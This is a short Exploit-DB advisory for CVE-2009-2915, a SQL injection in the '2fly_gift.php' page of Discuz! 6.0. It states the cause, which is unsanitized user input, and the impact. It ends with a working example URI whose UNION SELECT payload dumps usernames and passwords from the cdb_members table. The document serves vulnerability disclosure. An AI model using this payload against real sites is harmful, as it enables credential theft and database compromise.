Discuz! 6.0 - '2fly_gift.php' SQL Injection Vulnerability

2009-08-15T00:00:00
ID EDB-ID:33166
Type exploitdb
Reporter Securitylab.ir
Modified 2009-08-15T00:00:00

Description

Discuz! 6.0 '2fly_gift.php' SQL Injection Vulnerability. CVE-2009-2915. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/36044/info

Discuz! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Discuz! 6.0 is affected; other versions may also be vulnerable. 

The following example URI is available:

http://www.example.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members